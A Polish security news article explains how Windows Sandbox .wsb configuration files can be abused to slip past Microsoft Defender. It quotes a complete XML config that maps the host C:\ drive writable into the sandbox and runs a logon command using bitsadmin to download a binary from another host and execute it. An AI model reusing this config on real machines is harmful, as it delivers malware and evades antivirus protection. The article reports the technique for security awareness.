Windows Sandbox potrafi oszukać antywirusa Microsoft Defender

07 12 2020

Funkcja Windows Sandbox została wprowadzona do Windows 10 Pro i Windows 10 Enterprise jako uzupełnienie zabezpieczeń systemowych przed exploitami. Niestety nie w pełni zostało to przetestowane pod kątem bezpieczeństwa, ponieważ początkowo funkcja piaskownicy miała pomagać w walce przeciwko exploitom na antywirusa Microsoft Defender. Używanie exploitów to niebezpieczny proceder, ponieważ za pomocą luki w antywirusie możliwe jest uruchomienie kodu z uprawnieniami systemowymi. „Sandboksowanie” miało przed tym chronić. I zamiast zabezpieczeń mamy nowy sposób używania systemowych funkcji do oszukiwania antywirusa Microsoft Defender.

Windows Sandbox w Windows 10 Pro / Enterprise

Piaskownica Microsoftu to w rzeczywistości:

  • maszyna wirtualna wykorzystująca wbudowany hiperwizor Hyper-V,
  • posiadająca funkcję przywracania migawek (przy każdym nowym uruchomieniu),
  • pozwalająca na odzyskanie pamięci RAM zarezerwowaną do działania piaskownicy,
  • umożliwia dynamiczne współdzielenie plików z hostem.

Windows Sandbox może używać plików z rozszerzeniem *.WSB jako dodatkowej konfiguracji dla maszyny wirtualnej. Jest to zwykły plik XML z informacjami technicznymi np. ilościami rdzeni CPU, współdzieleniem schowka, karty sieciowej itp. Więcej danych na ten temat podaje firma Microsoft na tej stronie oraz na tej. Dodajmy, że rozszerzenie WSB jest domyślne skojarzone z programem WindowsSandbox.exe.

window sandbox w windows 10
Windows Sandbox w Windows 10 Pro. Windows 10 Home nie posiada takiej funkcjonalności.

Internauta opisał na blogu jak obejść zabezpieczenia antywirusa Microsoft Defender za pomocą Windows Sandbox. Stworzył konfigurację XML zawierającą polecenia pobierające szkodliwy plik.

<Configuration>
<MappedFolders>
   <MappedFolder>
     <HostFolder>C:\</HostFolder>
     <SandboxFolder>C:\Users\WDAGUtilityAccount\UserFiles</SandboxFolder>
     <ReadOnly>false</ReadOnly>
   </MappedFolder>
</MappedFolders>
<LogonCommand>
    <Command>C:\Users\ping 127.0.0.1 -n 3>null&bitsadmin /transfer myjob /download /priority high http://192.168.0.4/cs_wsb_test.bin "%APPDATA%\cs.exe">nul&start %APPDATA%\cs.exe</Command>
  </LogonCommand>
</Configuration>

Tym oto sposobem zespoły red-team i cyberprzestępcy uzyskali nową sposobność na obchodzenie zabezpieczeń Windows. Brawo!

PODZIEL SIĘ:

Share on facebook
Share on twitter
Share on linkedin
Share on email
AUTOR: Adrian Ścibor
Redaktor prowadzący AVLab.pl
guest
0 komentarzy
Inline Feedbacks
View all comments

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA
BĄDŹ ZAWSZE NA BIEŻĄCO!
zapisz się

Bitdefender GravityZone Webinarium

Dowiedz się, co eksperci mówią o GravityZone

Porównanie rozwiązań ochronnych

DLA GOSPODARSTWA DOMOWEGO I MIKRO FIRMY

Dlaczego korzystamy z dHosting?

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA
BĄDŹ ZAWSZE NA BIEŻĄCO!
zapisz się

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA E-MAIL I ZAWSZE BĄDŹ NA BIEŻĄCO!
zapisz się

POLECANE PRODUKTY

YUBICO

Klucze zabezpieczające

SILNE UWIERZYTELNIANIE DWUSKŁADNIKOWE, WIELOSKŁADNIKOWE I BEZ HASŁA

RAPORT
Cyberbezpieczeństwo:
Trendy 2021

Już dostępny!

Dlaczego korzystamy
z dHosting?

YUBICO

Klucze zabezpieczające

SILNE UWIERZYTELNIANIE DWUSKŁADNIKOWE, WIELOSKŁADNIKOWE I BEZ HASŁA

Bitdefender GravityZone Webinarium

Dowiedz się, co eksperci mówią o GravityZone